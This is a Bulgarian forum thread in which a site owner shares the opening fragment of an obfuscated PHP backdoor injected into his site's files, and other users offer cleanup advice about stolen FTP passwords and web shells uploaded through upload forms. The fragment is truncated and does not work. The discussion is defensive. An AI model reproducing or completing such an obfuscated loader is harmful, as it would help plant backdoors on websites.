Интересен php хак

[shterev]

Някой да е попадал на подобен злонамерен код?

<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90ю

Това е само откъс.

 

[TryMe]

Само от тази част не схващам кое в него може да е злонамерено.

 

[HerpaMoTeH]

Ако искаш постави го целия и опиши малко какво знаеш за него Може да се намер повече информация.

 

[shterev]

Не мога ад го поставя целия , дава гешка
Ето това изнамерих в нета http://blog.sucuri.net/2011/09/ask-sucuri-what-about-the-backdoors.html

 

[dakata__92]

Не мога ад го поставя целия , дава гешка
Ето това изнамерих в нета http://blog.sucuri.net/2011/09/ask-sucuri-what-about-the-backdoors.html

Тази тема ми стана мега интересна ! Въпроса е как ще вкарат този код в страницата, ако се филтрират входните данни през форма ?

 

[rosko]

Пейстни го в pastebin, като не ти дава тук

 

[shterev]

Ето линк

http://pastebin.com/CHLqS67A

 

[dakata__92]

Ето линк

http://pastebin.com/CHLqS67A

Добре какво прави този код ?

 

[shterev]

Ето линк

http://pastebin.com/CHLqS67A

Добре какво прави този код ?

Този код е някакъв хак, нямам идея как са успели да го набутат в края на php файла

 

[TryMe]

Ето линк

http://pastebin.com/CHLqS67A

Добре какво прави този код ?

Този код е някакъв хак, нямам идея как са успели да го набутат в края на php файла

Ама на теб ли ти го нахакаха ? Или просто си попаднал някъде на това ?

 

[shterev]

Ако бях го гледал някъде щях ли да си правя труда да го пускам тук? Естествено ,че го набутаха на един по-стар сайт. Просто се чудя какво прави и как може да се предотврати следваща поява

 

[dakata__92]

Имаш ли форма която добавя някакъв голям текст и писле го вади от базата на страницата ? Какви връзки имаш на страницата :shock:

 

[StormBreaker]

Ако бях го гледал някъде щях ли да си правя труда да го пускам тук? Естествено ,че го набутаха на един по-стар сайт. Просто се чудя какво прави и как може да се предотврати следваща поява

Имаш вирус на компютъра. Случвало ми се е, но вкарваха iframe. Вируса следи ftp клиентите и като имаш запазена парола за някое ftp то ти я взима и после бот обхожда и променя файловете. Преинсталирай, качи си хубава антивирусна и firewall и не пази паролите в ftp клиента (или ползвай ако има възможност за master password). И смени паролите на всичко, което имаш

 

[shterev]

Еда ли мога да преинсталирам, все пак това си е линукс сървар и има много други сайтове

 

[TryMe]

Еда ли мога да преинсталирам, все пак това си е линукс сървар и има много други сайтове

Ами тогава изчисти файловете и си смени паролата(на фтп и прочие), ако е възможно. И си изчисти твоя комп от вируси.

 

[StormBreaker]

Не сървъра да преинсталираш. Твоя компютър. От там е влязъл, не е проблема в сървъра

 

[HerpaMoTeH]

Ако някъде има форма за качване на файлове провери дали не са ти качили някой shell.

 

[r3nt3r]

Такива кодове обикновено са набутват през shell. Провери по обстойно за shell из машината ти ;]
EDIT: пробвай това http://pastebin.com/bPXdMKgb

 

[Galli]

И аз имах из сайтовете, беше се вкарал през filezilla във всички index.php headr.php footer.php файлове по всички директории и всички домейни. Аз се усетих като се появи вирусът и веднага проверих, но не го забелязах веднага. Сързваше се с botsvsbrowsers.com. Мислех си, че този сайт е нормален ама май не е ако така си събира информацията.
Имах и запазени пароли във firefox. Смених най-важните за всеки случай и форматирах диска.
Съветвам те да видиш на коя дата са редактирани файловете и да си спомниш какво си правил за да разбереш от къде ти дошло и ако имаш бекъп на файловете от предишна дата го използвай.

 

[antique]

почти съм 100% че е shell ако сайтовете ти имат опция за качване на картинки от там са го прикачили и провери за картинки на хоста ти дето не си качвал ти и името им е по странно всъщност са пълни с код.